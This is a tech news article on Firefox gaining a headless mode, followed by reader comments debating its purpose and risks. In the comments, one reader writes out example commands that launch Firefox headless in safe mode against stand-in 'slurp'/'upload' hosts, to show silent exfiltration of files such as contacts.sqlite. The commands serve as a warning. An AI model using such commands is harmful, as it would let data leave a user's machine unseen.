Firefox gets a new headless mode
Mozilla plans to introduce headless mode support in Firefox 55 Stable on Linux and Firefox 56 Stable on Windows and Mac devices.
Headless mode is a special display mode in which the web browser's user interface elements are not shown. Since that is the case, it is used in special use cases, for instance when you run automated tests or need to display a site or service without the user chrome of the web browser.
A bug was filed nine years ago on Bugzilla@Mozilla to integrate a headless mode in the browser.
Google Chrome supports headless mode already. We talked about how to enable it previously here on Ghacks, and I suggest you check out the guide if you want to find out how to run Chrome in headless mode.
For Firefox, you need to run Firefox 55 or later on Linux, or Firefox 56 or later on Windows or Mac, for support. You can check the version of the browser by loading about:support in the browser's address bar. This reveals the version of Firefox, the channel, and other information.
Note: Headless mode does not work properly right now. When you try to load Firefox with the -headless parameter you will notice that the browser won't start up at all. I tested this on Windows and Linux, and several different Firefox versions, and it did not work at the time of writing. I did not try to run it in conjunction with Selenium though, so this may work already.
Running Firefox in headless mode
The initial implementation of headless mode in Firefox is basic. You need to run the browser with the -headless parameter to enable it. I suggest you create a new profile or use a portable version of Firefox for that, as you may not want to run your main Firefox profile in headless mode.
The reason behind this is that you don't get any user interface when you activate headless mode. This means that there is no address bar, no title bar, and no tab bar that you can interact with.
You can follow the development of headless mode in the Firefox web browser with a click on this link. It leads to the meta bug on Bugzilla@Mozilla.
Problem solved after verifying integrity of places database (in about:support), and a restart in safe mode. :-)
On GNU/Linux, Firefox 55.0.3 loading of bookmarks, addons and stuff takes about 10 seconds.
Having read the excellent explanations by GH, together with the links he which he provided, this unseen, “background”, FF version can cause huge problems for the average user.
I can see the advantages when developers use it but there seems to be no reason to make it universally available. This could turn into Hacker Heaven, judging by the content of the links provided by GH.
Let’s hope Mozilla implements the lockpref and limits the download to registered users.
whoosh… seems my earlier explanation / analogy missed the mark, and folks (Tom, at least) are confused by the terms “chromeless” vs “headless”.
Although I agree with the validity of anonymous’ comment about the benefit, the value, of the headless feature FOR DEVELOPERS, IN A TESTING SCENARIO…
WALK WITH ME. TAKE A LOOK:
https://searchfox.org/mozilla-central/search?q=headless&case=true&path=
POINT:
The headless feature is unconditionally built-in
(is included in “release channel” not just conditionally built for “developer edition”)
https://searchfox.org/mozilla-central/source/widget/moz.build
https://searchfox.org/mozilla-central/source/toolkit/xre/nsAppRunner.cpp
POINT:
Can be used in conjunction with webrtc (mic/camera) functionality and, in fact,
that is a supported “use case”, by design (screencasting, chromecasting)
https://searchfox.org/mozilla-central/source/media/webrtc/trunk/webrtc/build/chromium_common.gypi
POINT:
Malware on your system (or a link in clicked, in email or???) can invoke
firefox –headless –new-instance –safe-mode hxxt://badsite.us/slurp?upload=payload
No UI is presented (you don’t see jack-shit)
and the “safe-mode” arg bypasses loading of your adblock/noscript extensions
and… yeah
==================
Going forward, mozilla must AT A MINIMUM, provide a userpref governing availability of headless mode, to accommodate lockdown via a customized browser/defaults/preferences/vendor.js
// Forbid headless invocation
lockPref(“app.allowheadless.enabled”, false);
Never tested this “headless mode” but basically what difference with the full-screen mode, in terms of view I mean?
Also, a simple CSS could hide all chrome elements as well (with a little “firegesture” to recover them), no? It’s not that I must, it’s that I am obviously missing something…
When I tried opening both Firefox and Chrome in headless mode nothing appeared on the screen.
headless == no gui
Try this description on for size:
exposes (via commandline invocation) the equivalent of “out-of-band xHttpRequest functionality” to any program/process on your system.
===============
maybe this analogy will Ring a Bell for you:
MSOutlook + vbscript + MSIE == oh noez, all my megahurtz haz been stoled !110!1
(my related comment from 3 hours ago still shows “Your comment is awaiting moderation”)
“Chrome and Firefox Headless Modes May Spur New Adware & Clickfraud Tactics”
bleepingcomputer.com
https://www.bleepingcomputer.com/news/security/chrome-and-firefox-headless-modes-may-spur-new-adware-and-clickfraud-tactics/
Now I get it. Thanks @Anonymous.
I admit I’ve been lazy. As sometimes (often, always) if nothing exciting triggers your curiosity you remain somewhat passive and start mumbling ‘Yeah, what for” :) I dislike that attitude and just surprised myself incarnating it. Anyway I’ve learned something.
@Tom Hawack
Point is simply to save resources and to be able apply Firefox in automated testing enviroment (VMs communicated via network, no keyboard, no mouse, no display etc.). For end user this doesn’t matter much, if not at all, but for automated testing, quite alot.
Take a look at the MDN doc that was linked in the article, it showcases the point quite nicely.
That’s under the hood. What I meant is what is seen by the user : full-screen is also gui free (unless a script, an add-on allows to have a toolbar appear). I mean : your screen displays the the same in full-screen and headless modes, no? In other words, what’s the point, the advantage of the headless mode (unless there be but disadvantages if I read you correctly).
Inclusion of this feature in the “release-channel” version of the product is unconscienable.
“You need to run the browser with the -headless parameter to enable it.”
YOU, OR ANY PROCESS/SCRIPT WHICH CAN INVOKE A COMMANDLINE:
$ firefox -headless https://slurp-yer-files-silently.daht.com?upload=contacts.sqlite
This “headless” anti-feature creates a handy exfiltration vector for malware and spyware.
Expect a feelgood “checkbox” will be presented to users to “disable” this… and also expect it’ll will “accidentally” get re-enabled during auto-updates.
Good thing. Browser automation is important, especially if it’s heading towards W3C standard
A few months back, when I read (in an editorial written by a Tor / TailsLinux” advocate) “don’t use Chrome, or Firefox. They are botnets.” I scratched my head, didn’t understand.
Today… aha, realization! Provides out-of-band comm capability, readily accessible via IPC (interprocess communication) to other installed programs…
W3C. They were unsuccessful in foisting NaCl (native client) on us. Now, mozilla is corroborating with ’em ~~ punching holes in the dike, to serve the interests of “wannabe anti-malware vendors”? Check it out: Who comprises the W3C board? What are the interests/affiliations of those board members?
The news regarding this “headless” anti-feature leaves me feeling stunned. Later, as emotions kick in, I’ll probably feel angry or betrayed or whatever… but right now I’m just flat-out stunned.
Named after Mozilla leadership.
The article you linked for chrome headless mode is wrong. kiosk and app mode are not headless mode. The command for chrome headless mode is same as firefox which is -headless.
https://developers.google.com/web/updates/2017/04/headless-chrome
Honestly, I’ve got the impression Mozilla has been in a headless mode for quite a while.
You took the words right out of my mouth.
As far as Windows is concerned hitting the F11 key is all you need to get ‘headless mode’.
You may feel it’s the same. But NO, fullscreen mode and headless mode are two different things or two different purposes.
Yes. F11 works on Windows 10 in Firefox ESR 52.3.0 (64-bit) to get “headless mode”.
There’s a bug in FireFox, at least in ESR52 it is present, which allows you to run it in some sort of fullscreen but in whatever window size you like (you can also leave a 2560x30px gap for taskbar if you like): imgur.com/a/TpHWg
To trigger:
1. maximise Fx
2. F11
3. WinKey
4. click on AeroPeak (bottom right on taskbar, near clock)
5. restore Fx from taskbar
Now it’s fullscreen with taskbar visible. At this point you can use Process Explorer (or other similar tools) to “restore” FireFox’s window, which could be docked on a side for instance.. Btw, top edge still triggers tab bar, so you can easily minimise, switch tab, got to address, etc..
Hey, that’s fun! Thanks for the tip. I like how there’s always something new to learn about Firefox.